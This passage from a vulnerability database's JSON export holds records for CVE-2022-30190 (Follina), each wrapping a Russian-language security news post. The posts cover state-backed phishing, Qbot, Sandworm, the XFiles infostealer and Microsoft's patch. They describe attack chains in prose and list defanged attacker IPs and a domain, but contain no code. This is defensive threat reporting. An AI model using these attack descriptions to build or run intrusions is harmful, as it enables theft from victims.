\u0420\u0424.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #Sandworm #Follina\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-14T15:48:06.000000Z"}, {"uuid": "01a1e421-d0c0-432f-8295-6eed3a6e4983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/rvXi86HDIl7XGWfAbwrfkCDBY-P6DLuptUq4D-tOA8F9OF0", "content": "", "creation_timestamp": "2026-04-10T15:00:21.000000Z"}, {"uuid": "270b2c4d-fb8a-4cda-8edc-c4c7c138e99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/772", "content": "\u200b\u26a1\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0441\u0442\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435\u043c.\n\n\ud83d\udcac \u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b, \u0441\u043f\u043e\u043d\u0441\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0432\u0435\u043b \u043d\u043e\u0432\u0443\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0432\u0440\u043e\u043f\u044b \u0438 \u0421\u0428\u0410. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Proofpoint \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-30190 c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8. \u0426\u0435\u043b\u044f\u043c \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.\n\n\u00ab\u042d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u043e\u0434 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 RTF \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0441 45.76.53[.]253\u00bb, \u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043b\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432 Twitter .\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432 \u0432\u0438\u0434\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0438\u043c\u0435\u0435\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 Base64 \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u00abseller-notification[.]live\u00bb.\n\n\u00ab\u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 , \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Proofpoint.\n\n\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439, \u043d\u043e \u043e\u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0430 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell.\n\n\u00ab\u041e\u0431\u0448\u0438\u0440\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u0430\u044f \u0432\u0442\u043e\u0440\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c PowerShell, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u041f\u041e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0446\u0435\u043b\u0438. \u0410\u0442\u0430\u043a\u0430 \u043d\u0430 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0438 \u043c\u0435\u0441\u0442\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0432\u043b\u0430\u0441\u0442\u0438 \u0421\u0428\u0410 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0441 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 Proofpoint.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Follina \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00abms-msdt\u00bb \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439. \u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c Microsoft \u043f\u0440\u0438\u0437\u0432\u0430\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b , \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u0422\u0438\u0431\u0435\u0442\u0430 .\n\n#Follina #\u041a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435 #\u0425\u0430\u043a\u0435\u0440\u044b\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-06T13:17:42.000000Z"}, {"uuid": "66eb799b-ebd0-4b41-a27c-227c2423e26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/833", "content": "\u200b\u2694\ufe0f Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e 0-day Follina \u0438 \u0435\u0449\u0435 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\ud83d\udcac \u0418\u0437 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0442\u0440\u0438 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c RCE-\u0430\u0442\u0430\u043a\u0438. \u0412\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u043a\u0430\u043a \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435. \u0412 \u043f\u0430\u0442\u0447 \u043d\u0435 \u0432\u043e\u0448\u043b\u0438 5 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 Microsoft Edge Chromium, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0440\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041d\u0438\u0436\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0432 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:\n\n\u2014 12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438;\n\u2014 27 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n\u2014 11 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;\n\u2014 3 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0441\u043f\u0443\u0444\u0438\u043d\u0433.\n\n\u0425\u043e\u0447\u0435\u0442\u0441\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0439 0-day Follina. \u041c\u044b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u0435\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f.\n\nFollina \u0438\u043b\u0438 \u0436\u0435 CVE-2022-30190 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u0440\u0438\u0433\u043b\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0445\u0430\u043a\u0435\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u0421\u0430\u043c\u044b\u043c\u0438 \u0433\u0440\u043e\u043c\u043a\u0438\u043c\u0438 \u0441\u043b\u0443\u0447\u0430\u044f\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u0438:\n\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440\u0430 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0421 \u0438 \u0421\u0428\u0410;\n\u2014 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Qbot;\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 Sandworm \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418.\n\n\u041f\u0430\u0442\u0447 \u0431\u0443\u0434\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430.\n\n#Microsoft #Follina #\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-16T05:16:47.000000Z"}, {"uuid": "01f88c79-c870-48d1-862f-8cc316e4198f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/924", "content": "\u200b\u2694\ufe0f \u0418\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0430\u0442\u0430\u043a\u0443\u0435\u0442 Windows \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina.\n\n\ud83d\udcac \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Cyberint \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 (Follina) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 OLE-\u043e\u0431\u044a\u0435\u043a\u0442, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0435\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c JavaScript-\u043a\u043e\u0434. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f PowerShell-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 Windows \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. \u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0434\u0443\u043b\u044c \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b-\u043a\u043e\u0434. \u041e\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c AES-\u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c \u0436\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 API.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f XFiles \u043a\u0440\u0430\u0434\u0435\u0442 cookie-\u0444\u0430\u0439\u043b\u044b, \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u043a\u0440\u0438\u043f\u0442\u043e\u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430, \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0441\u043d\u0438\u043c\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Discord \u0438 Telegram.\n\n\u0424\u0430\u0439\u043b\u044b \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0432\u043e \u0432\u043d\u043e\u0432\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Telegram.\n\n#\u0421\u0442\u0438\u043b\u0435\u0440 #\u0425\u0430\u043a\u0435\u0440\u044b #Follina #XFiles\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-07-01T12:58:38.000000Z"}, {"uuid": "28125cf5-cb6f-43b9-9551-ccf6e688d0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/2680", "content": "\u200b\u26a1\ufe0f\u0425\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Asylum Ambuscade \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u0443\u044e \u043c\u043e\u0442\u0438\u0432\u0430\u0446\u0438\u044e \u0441 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c.\n\n\ud83d\udcac \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Asylum Ambuscade, \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c \u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u042d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2020 \u0433\u043e\u0434\u0430 \u0438 \u0431\u044b\u043b\u0430 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Proofpoint \u0432 